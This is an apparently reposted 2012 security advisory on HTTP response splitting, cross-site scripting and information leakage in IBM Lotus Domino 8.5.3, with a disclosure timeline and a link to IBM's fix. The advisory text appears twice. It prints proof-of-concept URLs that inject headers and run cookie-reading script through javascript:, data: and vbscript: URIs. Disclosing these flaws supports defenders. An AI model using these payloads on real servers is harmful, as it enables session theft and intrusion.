HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
2012-09-20 11:58
706 查看
I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities.
CVE ID: CVE-2012-3301.
-------------------------
Affected products:
-------------------------
Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on other vulnerabilities, about which I've informed them.
For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160
----------
Details:
----------
HTTP Response Splitting (WASC-25):
http://site/servlet/%0AHeader:value%0A1
Cross-Site Scripting (WASC-08):
Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9):
http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1
Will work in all versions of Firefox, but without access to cookies:
http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1
Also there can be used Location header for XSS attack (for which there are its own nuances of work in different browsers).
Cross-Site Scripting (WASC-08):
The attack is possible via data: and vbscript: URI.
http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
In x.nsf, "x" means username of logged in user.
------------
Timeline:
------------
Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).
- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).
XSS (WASC-08):
This XSS in March 2008 worked in such way:
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//
Since that time vector of attack via javascript: URI was fixed (it's quite
possible that my German client informed IBM in 2008 about multiple holes,
which I found in Domino). But there is a possibility to attack via data: and
vbscript: URI.
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
Information Leakage (WASC-13):
At page https://site/domcfg.nsf, which is accessible without authentication,
there is a leakage of information about Web Server Configuration. Such
situation I saw at many sites on Lotus Domino.
CVE ID: CVE-2012-3301.
-------------------------
Affected products:
-------------------------
Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on other vulnerabilities, about which I've informed them.
For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160
----------
Details:
----------
HTTP Response Splitting (WASC-25):
http://site/servlet/%0AHeader:value%0A1
Cross-Site Scripting (WASC-08):
Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9):
http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1
Will work in all versions of Firefox, but without access to cookies:
http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1
Also there can be used Location header for XSS attack (for which there are its own nuances of work in different browsers).
Cross-Site Scripting (WASC-08):
The attack is possible via data: and vbscript: URI.
http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
In x.nsf, "x" means username of logged in user.
------------
Timeline:
------------
Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html).
- During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I've wrote five advisories via contact form at IBM site.
- At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes).
- At 28.08.2012 I've disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).
XSS (WASC-08):
This XSS in March 2008 worked in such way:
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//
Since that time vector of attack via javascript: URI was fixed (it's quite
possible that my German client informed IBM in 2008 about multiple holes,
which I found in Domino). But there is a possibility to attack via data: and
vbscript: URI.
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
Information Leakage (WASC-13):
At page https://site/domcfg.nsf, which is accessible without authentication,
there is a leakage of information about Web Server Configuration. Such
situation I saw at many sites on Lotus Domino.
相关文章推荐
- BF and IA vulnerabilities in IBM Lotus Domino
- How to use HttpWebRequest and HttpWebResponse in .NET
- Http Response Splitting and Cache poisoning
- Http Request and Http Response in Java
- 转:Working with HttpWebRequest and HttpWebResponse in ASP.NET
- IBM lotus domino install in linux
- XPages Extension Library Deployment in Domino 8.5.3 and IBM XWork Serve
- Using the LND tool to analyze IBM Lotus Notes and Domino hangs and crashes
- Creating your first Web Service provider and consumer in LotusScript and Java.
- Packet type http and httph in {inet,ssl}:setopts/2
- IBM Lotus Domino 8.5 配置指南
- 诊断并解决IBM Lotus Domino 8 邮件路由问题
- Use HttpUtility and NameValueCollection in c# of Visual Studio 2010
- C# 中的委托和事件——http://www.tracefact.net/CSharp-Programming/Delegates-and-Events-in-CSharp.aspx
- IBM Lotus Domino 8.5 服务器管理入门手册
- 微软挖IBM墙角 再度向Lotus Notes/Domino用户招手
- IBM Lotus Domino 8.5 配置指南
- [新闻转载] IBM将公测Notes和Domino 9.0社交版 不再使用Lotus品牌
- Advanced Request and Response HTTP Header Viewer
- is not abstract and does not override abstract method getIncludes() in org.apache.jasper.runtime.HttpJspBase 问题